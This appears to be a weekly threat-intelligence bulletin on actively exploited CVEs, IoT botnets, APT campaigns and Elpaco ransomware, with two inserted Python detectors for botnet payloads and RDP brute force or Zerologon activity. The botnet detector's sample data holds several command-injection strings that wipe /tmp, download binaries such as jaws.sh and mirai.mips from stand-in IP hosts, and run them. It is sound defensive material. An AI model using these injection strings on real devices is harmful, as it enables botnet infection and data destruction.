Executive Summary
This week CISA added just one CVE to its KEV catalog: a critical improper authentication vulnerability in Array Networks AG and vxAG ArrayOS (CVE-2023-28461), a reminder of the risk carried by unpatched, internet-facing appliances. The ProjectSend authentication bypass also remains under active exploitation, widening the exposure of self-hosted file-sharing platforms.
Meanwhile, the IoT_Reaper botnet continues to target vulnerabilities in MVPower CCTV DVRs. Zerobot has ramped up exploitation of a three-year-old Apache HTTP Server vulnerability that many deployments still have not patched, while established botnets such as Enemybot, LiquorBot, and Mirai remain active and keep exploiting a nine-year-old flaw in D-Link DIR-645 routers. These ongoing attacks underline how long outdated devices and unpatched vulnerabilities stay profitable for botnet operators.
Cyber espionage groups, including Earth Kasha, Earth Estries, and APT-K-47, are exploiting weaknesses in public-facing systems to infiltrate networks for long-term surveillance and data theft. In parallel, the Elpaco ransomware, an offshoot of Mimic, gains entry through brute-forced RDP logons and then exploits the Zerologon flaw (CVE-2020-1472) to escalate privileges before deploying its payload. Matrix, meanwhile, is leveraging IoT device vulnerabilities and default credentials to build botnets for large-scale DDoS attacks. Together these developments show the growing diversity of threats against vulnerable systems worldwide.
Trending / Critical Vulnerabilities
Trending vulnerabilities are the flaws currently being discussed and exploited most widely; tracking them helps defenders prioritize patching and monitoring.
An improper authentication vulnerability (CVE-2024-11680) in the ProjectSend open-source file-sharing application allows remote, unauthenticated attackers to modify the application's configuration by sending specially crafted HTTP requests. Rated CVSS 9.8 (critical), the flaw affects versions prior to r1720. The fix was committed in May 2023, but the vulnerability was only publicly disclosed with the release of r1720 in August 2024. According to VulnCheck, it has likely been exploited in the wild, with signs of exploitation observed across internet-facing ProjectSend instances.
A critical improper authentication vulnerability (CVE-2023-28461) in Array Networks AG and vxAG ArrayOS, affecting versions 9.4.0.481 and earlier, can be exploited remotely without credentials and allows attackers to execute arbitrary code on affected systems. Rated CVSS 9.8, it has been added to CISA's KEV catalog, which mandates urgent remediation.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed to derive insight into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Vulnerabilities exploited by botnets, including recent CVEs logged in MISP. The top 5 CVEs are those whose payloads are suggestive of botnet activity, such as using wget to fetch a stager from a raw IP address.
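As an added example (not part of the original report and not Loginsoft's own tooling), the following Python script applies the "wget with a raw IP address" heuristic to a handful of constructed request strings shaped like the command-injection payloads IoT botnets send: it URL-decodes each record, looks for a downloader, a bare-IPv4 download URL, a writable staging directory and a chmod/sh execution chain, and tallies the payload hosts. The sample records, the regexes and the three-level verdict are assumptions for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample sensor records (request line plus any injected header or
# body, flattened to one string). Synthetic, shaped like common IoT botnet
# command injection; not captured telemetry.
SAMPLES = [
    "GET /shell?cd+/tmp;rm+-rf+*;wget+http://198.51.100.7/jaws.sh;sh+/tmp/jaws.sh HTTP/1.1",
    'POST /HNAP1/ SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
    '`cd /tmp; wget http://203.0.113.45/bins/mirai.mips; chmod 777 mirai.mips; ./mirai.mips dlink`"',
    "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh echo;cd /tmp;curl -O http://192.0.2.10:8080/x86;chmod +x x86;./x86",
    "GET /admin/login?user=admin&pass=admin HTTP/1.1",
    "GET /index.php?id=1%27%20OR%201%3D1-- HTTP/1.1",
    "POST /api/update body=wget%20http%3A%2F%2Fupdates.example.com%2Fpkg.tar.gz",
]

DOWNLOADER = re.compile(r"\b(wget|curl|tftp)\b", re.I)
# A download URL whose host is a bare IPv4 literal: the "wget with an IP" tell.
RAW_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/", re.I)
# World-writable directories botnet stagers cd into before fetching a binary.
STAGING_DIR = re.compile(r"\bcd\s+/(tmp|var/tmp|dev/shm|var/run|mnt)\b")
# Make-executable-and-run chain that follows the download.
EXEC_CHAIN = re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})\s|\bsh\s+\S+|busybox", re.I)


def normalize(raw: str) -> str:
    """URL-decode twice (double encoding is common) and turn '+' into spaces."""
    return unquote_plus(unquote_plus(raw))


def analyze(raw: str) -> dict:
    """Extract botnet indicators from one request and return a verdict."""
    text = normalize(raw)
    ind = {}
    m = DOWNLOADER.search(text)
    if m:
        ind["downloader"] = m.group(1).lower()
    hosts = RAW_IP_URL.findall(text)
    if hosts:
        ind["raw_ip_hosts"] = sorted(set(hosts))
    m = STAGING_DIR.search(text)
    if m:
        ind["staging_dir"] = "/" + m.group(1)
    if EXEC_CHAIN.search(text):
        ind["exec_chain"] = True
    # A downloader pulling from a raw IP is the strong signal; a downloader or
    # exec chain alone is worth a look but also matches legitimate automation.
    if "downloader" in ind and "raw_ip_hosts" in ind:
        verdict = "botnet-like"
    elif "downloader" in ind or "exec_chain" in ind:
        verdict = "suspicious"
    else:
        verdict = "no-indicator"
    return {"verdict": verdict, "indicators": ind, "decoded": text}


def payload_hosts(records) -> Counter:
    """Count raw-IP download hosts across botnet-like records; these are the
    hosts to block or sinkhole and to pivot on for related campaigns."""
    hosts = Counter()
    for r in records:
        a = analyze(r)
        if a["verdict"] == "botnet-like":
            hosts.update(a["indicators"]["raw_ip_hosts"])
    return hosts


if __name__ == "__main__":
    for r in SAMPLES:
        a = analyze(r)
        print(f'{a["verdict"]:12} {a["indicators"]}')
    print(payload_hosts(SAMPLES).most_common())
```

Run it as-is to see the three injection-shaped samples classified as botnet-like, the wget-from-a-hostname sample as merely suspicious, and the login and SQL-injection probes as carrying no botnet indicator. On real sensor data, pair the raw-IP host counter with the CVE mapping of the request path to get the "top CVEs by botnet payload" view this section describes.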
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is studied manually and mapped to MITRE ATT&CK tactics and techniques. The information is drawn from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
A high-severity remote code execution vulnerability in WPS Office for Windows (CVE-2024-7262) was exploited in an August 2024 attack attributed to APT-C-60. This South Korea-aligned cyber espionage group used a job-application-themed lure to deploy the SpyGlace backdoor against an organization in Japan. The incident, disclosed by JPCERT/CC, illustrates the group's tradecraft and its focus on East Asian targets.
CVE-2024-9680 and CVE-2024-49039
The Russia-aligned RomCom threat group has been linked to the exploitation of two zero-day vulnerabilities, a use-after-free in Mozilla Firefox (CVE-2024-9680) chained with a Windows Task Scheduler privilege escalation (CVE-2024-49039), to deploy its backdoor. The chain requires no interaction beyond the victim visiting an attacker-controlled web page: the Firefox bug gives code execution inside the browser's content process, and the Windows bug escapes the browser sandbox so the RomCom backdoor can be installed on the system, a level of stealth and sophistication unusual for this group.
CVE-2023-28461, CVE-2023-45727 and CVE-2023-27997
Trend Micro's recent analysis highlighted that Earth Kasha, a China-linked cyber espionage group, has been actively exploiting vulnerabilities in public-facing enterprise technologies, namely Array AG (CVE-2023-28461), Proself (CVE-2023-45727) and Fortinet FortiOS (CVE-2023-27997), to gain initial access to targeted networks. Since early 2023, Earth Kasha has leveraged these vulnerabilities as part of its ongoing LODEINFO campaign, primarily against organizations in Japan, Taiwan, and India. Once inside victim networks, the group deploys a range of backdoors to maintain persistence, including Cobalt Strike, its own LODEINFO malware, and the newly discovered NOOPDOOR.
A critical vulnerability in RARLAB WinRAR (CVE-2023-38831), affecting versions prior to 6.23, allows remote attackers to execute arbitrary code when a user opens a specially crafted archive. The Knownsec 404 team identified that APT-K-47 (also known as Mysterious Elephant), a South Asia-based threat actor active since 2022, exploited this flaw in its campaigns. Using successive iterations of its Asyncshell malware, up to the current Asyncshell-v4, the group executed cmd and PowerShell commands on compromised hosts. The vulnerability served as the entry point for system access, highlighting the group's persistent targeting of organizations.
Kaspersky Labs has identified a sophisticated ransomware variant called Elpaco, an advanced evolution of the Mimic ransomware family. This malware breaches systems through compromised Remote Desktop Protocol (RDP) connections, often gained via brute force attacks. Once inside, the attackers escalate their privileges by exploiting the critical Zerologon vulnerability (CVE-2020-1472), enabling full control over the victim's server and paving the way for ransomware deployment.
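As an added example, not code from Kaspersky or from this page, the following Python snippet implements two detections for the chain just described over constructed Windows Security events: a per-source sliding-window count of failed RDP logons (Event 4625, LogonType 10) and whether a success followed, and the Zerologon tell of a computer-account password change (Event 4742) whose subject is ANONYMOUS LOGON, together with the 5829 "vulnerable Netlogon channel allowed" event that domain controllers with the August 2020 update raise. The field names, thresholds and sample records are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security log records reduced to the fields the checks
# need. Synthetic data shaped like the chain above (RDP brute force followed by
# a Zerologon password reset); not taken from any real incident.
EVENTS = [
    # twelve failed RemoteInteractive (RDP) logons from one source in under a minute
    {"id": 4625, "time": f"2024-11-20T02:00:{i * 5:02d}", "logon_type": 10,
     "ip": "203.0.113.9", "target": "administrator"}
    for i in range(12)
] + [
    # ...then a success from the same source: the brute force worked
    {"id": 4624, "time": "2024-11-20T02:01:00", "logon_type": 10,
     "ip": "203.0.113.9", "target": "administrator"},
    # an unrelated single failure (mistyped password) that must not be flagged
    {"id": 4625, "time": "2024-11-20T09:15:00", "logon_type": 10,
     "ip": "198.51.100.4", "target": "jdoe"},
    # a patched DC logs 5829 when it still allows a vulnerable Netlogon channel
    {"id": 5829, "time": "2024-11-20T02:10:00", "target": "DC01$"},
    # Zerologon password-reset variant: the DC's own machine-account password is
    # changed by an unauthenticated (ANONYMOUS LOGON) subject
    {"id": 4742, "time": "2024-11-20T02:10:05", "subject": "ANONYMOUS LOGON",
     "target": "DC01$", "password_changed": True},
    # routine machine-password rotation: the account changes its own password,
    # which is normal and must not alert
    {"id": 4742, "time": "2024-11-21T03:00:00", "subject": "DC01$",
     "target": "DC01$", "password_changed": True},
]


def _ts(ev) -> datetime:
    return datetime.fromisoformat(ev["time"])


def rdp_bruteforce_sources(events, threshold=10, window=timedelta(minutes=5)) -> dict:
    """Return {source_ip: summary} for sources with at least `threshold` failed
    RDP logons inside any interval of length `window`."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ev in events:
        if ev.get("logon_type") != 10:      # 10 = RemoteInteractive (RDP)
            continue
        if ev["id"] == 4625:
            failures[ev["ip"]].append(_ts(ev))
        elif ev["id"] == 4624:
            successes[ev["ip"]].append(_ts(ev))
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end, t_end in enumerate(times):   # two-pointer sliding window
            while t_end - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_fail = times[-1]
            flagged[ip] = {
                "failures": len(times),
                "peak_in_window": peak,
                # a success after the burst means the password was guessed
                "followed_by_success": any(s > last_fail for s in successes.get(ip, [])),
            }
    return flagged


def zerologon_indicators(events) -> list:
    """Return findings that point at CVE-2020-1472 exploitation."""
    findings = []
    for ev in events:
        if ev["id"] == 5829:
            findings.append({"id": 5829, "time": ev["time"], "target": ev.get("target"),
                             "why": "DC allowed a vulnerable Netlogon secure channel"})
        elif (ev["id"] == 4742 and ev.get("password_changed")
              and ev.get("subject", "").upper() == "ANONYMOUS LOGON"
              and ev.get("target", "").endswith("$")):
            findings.append({"id": 4742, "time": ev["time"], "target": ev["target"],
                             "why": "machine-account password changed by ANONYMOUS LOGON"})
    return findings


if __name__ == "__main__":
    print(rdp_bruteforce_sources(EVENTS))
    print(zerologon_indicators(EVENTS))
```

The RDP check reports the brute-forcing source with its burst size and the fact that a success followed it; the Zerologon check returns the 5829 event and the anonymous 4742 reset while ignoring the account's own scheduled rotation. Treat the 4742 condition as a starting point and tune it against your own baseline of machine-account changes.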
Matrix Threat Actor Exploits IoT Weaknesses in Global Campaign
The threat actor known as Matrix has been associated with a large-scale distributed denial-of-service (DDoS) campaign that exploits vulnerabilities and misconfigurations in Internet of Things (IoT) devices to create a disruptive botnet. This campaign utilizes known security flaws and weak or default credentials to compromise a wide array of internet-connected devices, including IP cameras, DVRs, routers, and telecom equipment. Matrix leverages publicly available tools and scripts from platforms like GitHub, deploying malware such as Mirai and various DDoS-related programs on compromised devices. These include PYbot, pynet, DiscordGo, Homo Network, an HTTP/HTTPS flood attack JavaScript program, and a utility capable of disabling Microsoft Defender Antivirus on Windows systems. These attacks have predominantly targeted IP addresses in China, Japan, and, to a lesser extent, regions like Argentina, Australia, Brazil, Egypt, India, and the U.S., highlighting the campaign's global reach and emphasis on exploiting IoT ecosystems.
Earth Estries: Exploiting N-Day Vulnerabilities to Deploy Custom Backdoors in Southeast Asia
The China-linked cyber-espionage group Earth Estries has been observed leveraging a previously undocumented backdoor known as GHOSTSPIDER in a series of attacks targeting telecommunications companies in Southeast Asia. According to Trend Micro, the group, classified as an aggressive advanced persistent threat (APT), has also deployed the MASOL RAT on Linux-based systems within government networks in the region. The attack campaigns begin with exploiting N-day vulnerabilities in widely used enterprise technologies, including Ivanti Connect Secure, Fortinet FortiClient EMS, Sophos Firewall, and Microsoft Exchange Server vulnerabilities (ProxyLogon CVEs). Once initial access is gained, the attackers deploy custom malware, such as Deed RAT, Demodex, and GHOSTSPIDER, to maintain persistence and conduct long-term cyber-espionage operations.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand coverage.
External References
- https://www.cisa.gov/news-events/alerts/2024/11/25/cisa-adds-one-known-exploited-vulnerability-catalog
- https://blogs.jpcert.or.jp/ja/2024/11/APT-C-60.html
- https://securityonline.info/elpaco-ransomware-a-new-threat-actor-leverages-cve-2020-1472-for-global-attacks/
- https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/
- https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html
- https://medium.com/@knownsec404team/unveiling-the-past-and-present-of-apt-k-47-weapon-asyncshell-5a98f75c2d68
- https://securelist.com/elpaco-ransomware-a-mimic-variant/114635/
- https://www.trendmicro.com/en_us/research/24/k/earth-estries.html